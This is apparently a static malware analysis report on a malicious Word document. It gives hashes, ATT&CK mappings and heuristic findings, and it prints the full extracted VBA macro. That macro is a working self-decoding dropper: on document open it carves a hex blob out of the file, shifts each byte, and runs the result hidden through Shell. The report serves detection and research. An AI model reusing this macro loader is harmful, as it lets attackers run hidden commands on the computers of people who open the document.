Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 043844ffe995867c…

MALICIOUS

Office (OLE)

144.4 KB Created: 2018-02-15 00:00:00 Authoring application: Microsoft Office Word First seen: 2018-03-04
MD5: a2a8e01535c76739f4f0bb6850e8c263 SHA-1: aa7c5a559a655129ba5ca9ac58ecdd1028d1d857 SHA-256: 043844ffe995867cff151320756cf4e51e445bc6b99061e8c7a522d0cd085b59
160 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1059 Command and Scripting Interpreter

The file contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening. Critical heuristics indicate a potential Shell call and ClamAV detection confirms the file is malicious. The VBA macro appears to be obfuscated, but its presence and the shell call heuristic strongly suggest it's designed to download and execute a second-stage payload.

Heuristics 7

  • ClamAV: Xls.Malware.Cwsp-6735643-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Cwsp-6735643-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    x1:
    Shell Q_TVJ, vbHide
    GoTo x3
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
        Document_Open
End Sub
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Option Explicit
Sub Workbook_Open()
Dim Q_XBC As String
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8784 bytes
SHA-256: 004751a0670128be9c4066d85c1bcf66952353bb3bc58427c9d261e408323f95
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 27 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Sub Workbook_Open()
Dim Q_XBC As String
Q_XBC = "505050501E508D507D1D451E8C5017505E50505050502050505050502D80257F506754507D37507A503D503462668850225450506350297C7D83382850778D50501B507850503850825058504E503B1C3D47503F5050508E8A445284505750507D50505050236C505012384050501D834150672"
Dim XN_R As String
XN_R = "4702750288850505065122F50502765728E5A502D3E505050665B5556782D265086501D50508750266D7150508250505050504D4B507B2A31503E50505048508251501A508B50505018503D50507C5050383F824B505050505059326D5039508241505025421F2560442650507250552B502150"
Dim HUN_D As String
HUN_D = "11172C77502150501C7C5A5E50505050292B321750507550505053502937823B507A378E505050501B7B50243B50505062505050508050446029505078326333502943731E2B50508E5072276150504450503250503B5650503E5032502850495050883F555023525050492E505C50505042505"
Dim UQ_B As String
UQ_B = "96E507480504550186C505A50293B6050506455826250885050405050507C6F5050505550255076504C4A372650503150114447503D50506C505050503F506B74503A508A50505047285073505E5A8A6A504939505050508B5836501F581C475050504B1F6980596250504350345D7731506650"
Dim XQJ_R As String
XQJ_R = "427A5042675070504950501C5C502E88504F5C505050286D50345060508F503150502050502050195050631750505060505062504E2A508E4D50505266502E5050136C4D505050505487402E15861E6E50486F5081501B3638508F2A451A4650235D505050505F2F50855050844F50135082505"
Dim N_Q As String
N_Q = "0505050506D502550505B5050509026507753505A5050501C505F7C44572678501B5034502237641B50501B50503F2F50501B793D5050361E50505050506882502450506C5050505068505B3F45315E57601B50657750505069505073688F505050295D507D7D508A505D2F50505E506B651878"
Dim XN_KEX As String
XN_KEX = "5038176E5042505842116D50752C5050505050502B50755050672D18138742501B505776844C4043785D50503E374350508B35396E141D5A504374553B3B505050506A3A50367750206465505050505035764850621A851750507E515050194E5F50507B50193B50248E291B504F5F4B5050315"
Dim YPI_OLA As String
YPI_OLA = "0508650505F645550503650355C279030503E502C4B508650507A67505044502B50535B50573C2C8A56505050503F707E501550761150505050505090506A195050227068505050385050505050484750505073478E37507F7E505050502966506D505050508950504A4F507050589050615050"
Dim DX_LD As String
DX_LD = "635D505042503C2A41735050503C33502A502A715050507F6C5036891777505C137550508D16506F7979565E5045507D508B50507D765050507F506D501B5039506A2150508A1350405050373F505050502A50505050508C427B501C5054771D50235050647B5037504D74514B1D50501F50215"
Dim SZ_ZG As String
SZ_ZG = "05D595050345050302B6E50503B5086503C8E5F8E285041504D1E6352506E50507E1C501C7137142E5A502F31903C3D50504850764668774150506C6C50505953505050505050685B71501E50502D5037505050375049507D508A45505050585B507C5083502B28508815775B50507546505033"
Dim WWR_YAH As String
WWR_YAH = "6A3050164750613450502D50635050501E5050578250507A5040505083505039505D4E7E64545050765B5089132B50505057505050505050506441505D4A3A3675505750691150503C50503A3D5048505850505D505050505035795050505B5F501B4C505050615C743E507B8B1F2D5169F2505"
Dim HV_YPZ As String
HV_YPZ = "0148550505033507650505060503D505C505050616B6D2C6432275C747D4A5081642118505043273E6350502C503B42501D3A50504A5C5069505050505060507C505035505D795050506E50505050506C50712150502A50717F685062675015663B343F76C950507E254D50506950508C50504F"
Dim TS_J As String
TS_J = "545050175250504E8750697450508F504E5060518B5050832684508050137D2750585C70182B5050405050505050545074508E505013721640627C5050504D505D506A8E2F5034506F2150505250412B1D5084395050564050505B27721250504E50506E55736B355050355079506150BD508A3"
Dim I_NHC As String
I_NHC = "519844850508550585050315050505750503C5F50507132525D50506750651A4129508737665050595350156750501B135031503B50262427505050505021502778507B50825056506050502D5050506450458F16508A74215019561D68433250503C874C7C503356884E756C5050505050507C64507217507D5050505050508F503F50748D50502C2249505F2518275021507D5050506650355050503E575055505050564150605271505075815050774A4F50505080505050146D50501B3F535C338D795015875050507C507B85505950"

    Document_Open
End Sub
Public Sub H_OF()
   Dim Q_TVJ As String
   Dim H_S As String
   Dim QPI_QHP As Long
    Dim CWF_QAZ As String
    Dim iFile As Integer: iFile = FreeFile
    Open ActiveDocument.FullName For Binary As #iFile
        CWF_QAZ = Split(Input(LOF(iFile), iFile), "315649574A49554341565156585831455A5850")(2)
    Close #iFile
    GoTo x2
x1:
    Shell Q_TVJ, vbHide
    GoTo x3
x3:
    Exit Sub
x2:
   For QPI_QHP = 1 To Len(CWF_QAZ) Step 2
        H_S = Chr("&H" & Mid(CWF_QAZ, QPI_QHP, 2))
        Q_TVJ = Q_TVJ & Chr(Asc(H_S) - 17)
   Next
   GoTo x1
End Sub
Public Sub Document_Open()
Dim GGV_U As String
GGV_U = "3D764950505058503F8D50856150506E6650507B6227177A5045115050491F2E715F502C5050508062505050801D3A5050862250505037266F5050508050507F5025137950506F3A412A50836650501C5F6150386F5050388050503D225050535050385A505050678683501950258B502F895020505350505050432850492550"
Dim HA_LVJ As String
HA_LVJ = "242650501690508450516D50505029501150365044505E6150507F504E6F50505066505050506B475050363D55502B505086505050341950505050507B5030675051501185358B5050505039355050785028507F5026505E1150505078503950504F505068503B62856C50504A7F502427508D826850508511503D5030422719"
Dim SQI_KGN As String
SQI_KGN = "6A501F4D207E5088505044502550565050605080505F501550905035504C505041255015508D1F5050505F8650717F69584454507050845042483D50716362775050508D50507051435050117827502145508550507E5050255061313550505050158E507885503D198B50503250503C85507F508C5C501E2F1F301F136D2984"
Dim ORN_SJS As String
ORN_SJS = "23162F878711233E5250388F19505054502A508A51504227496A67502F172E8E681F50505050506C504B505018165078502550435050194E2D504D5033501A1150821350552B502E505F86744265507F501A2E5050355050885043305029435017643D7567505050884B6E501C50505016297C503350504350504A5050504754"
Dim W_MBW As String
W_MBW = "503B11501A604A61506C505B83227D2A516250505032505051435015501A5050152B5050507606502C5050505050713081501E478C50574A5C505046505050295668355063502F31506F2E508450855050506650502B5050701850506C785050502F502750493A6350745050573350508950505050505041875E673E30531C41"
Dim RVH_IH As String
RVH_IH = "5014505050502E814B7D5050292950504850505018508D5050505050437B6950AF2F56505050506429516E45824D506F6D77503E4D5027604C8518134134668B8552335029738C50758E545E81505B1C5078505050192A5050861D5062502D18505050504D505E503650506F501250505045508E8E50398740506650428C714C"
Dim GJ_PEL As String
GJ_PEL = "50503E5050782B6050564050505068506B5071504D50508E507650433E8A6D50507E17502938503F5050837F50505050425050115068504F381913802D505050523A505043506C50578D203950445050505050272759503050432250F0506D7F654050505052675050502950465050394E506D24505050242F505B5050506D50"
Dim CUW_DYR As String
CUW_DYR = "6F6E158850505050667E5050505084395C507350116C509450501C36375024507150483A50135030115050293360508A7A5013506C507E5017504058502F3C502354258150504450505050465050504F7D62585050505050505A505071855017504C88508950755050507B506B1A43505050595050505D50502050582F277850"
Dim IK_D As String
IK_D = "1C505050508050501D505045503F50505035505062505066317C50506B505053755045887E50508E744A50502A366350505050148D66502B507B198385503285505016507F6150502B5030878B32635057505050505050466E508B50461A50287784603050235050275046505050298E3C50508B505D50796A2250501A50508A"
Dim UY_II As String
UY_II = "6F2550137B5050855050664F7850502B72601B7F5050377E507C1250501D15503B5050262450505E8C505050115064507450506C50506050505028552E506170505043405D4D715050325040505050788F643B50387A4D745070501E506E475055663D3264288D8A505050816850506A2933506C375028505050505050F95050"
Dim Z_MMV As String
Z_MMV = "725050247750503A50501C5074495050507850253C505C5050423B50505057505020495086296C603B50298A5050431650192E508D71502C4716505050134D7E5080795050661B608750125044372650505050503A1C5C3C502E5F80506D7339505050374250908850502A50705050215050182517875450354D1D791850502B"
Dim FHI_R As String
FHI_R = "73505850875077676850506C505050454E9050665E321C77501350278073165065508A71501250505050505050825945502C4E5025504C3250508250522576675050565A508E505050506E8F3983505C5057504A51504F4F272533508D7E595050613D5070375056315029506B8B50876F7F2F505050871C50507A5025412550"
Dim O_YEB As String
O_YEB = "6232685D509050502A50507150505044892E503A142E6250505046807B8050501A6A503A5050871C505350505050504E5042505044506A50508423505D505051505F522150508E1F5059505076503D895050505050503519135050505024252F501550324850505021502F1E55505028502750508E2D19505050291546505050504D5050505030505A504E50507F32506B5052506D83502A50503B5050503B85468B572350234A50506F50502F505A2E503B5079127E50398D3150502E50502386504B391F685872"

    H_OF
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.